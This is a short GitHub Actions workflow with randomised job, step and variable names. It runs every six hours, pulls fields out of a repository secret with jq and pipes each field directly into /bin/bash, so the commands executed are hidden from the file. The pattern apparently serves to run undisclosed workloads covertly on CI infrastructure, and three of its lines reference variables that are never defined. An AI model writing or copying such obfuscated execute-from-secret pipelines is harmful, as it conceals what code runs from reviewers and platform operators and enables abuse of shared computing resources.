name: zhangzuqing3131

on:
  workflow_dispatch:
  schedule:
    - cron: '29 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangzuqing3131
        env:
          wxqv4882: ${{ secrets.wxqv4882 }}
        run: |
          echo $wxqv4882 | jq -r .uhwkx58 | /bin/bash
          echo $uwfy13 | jq -r .fqpn126 | /bin/bash
          echo $ipfzd3 | jq -r .mnaw3 | /bin/bash
          echo $kycz133 | jq -r .khs53 | /bin/bash

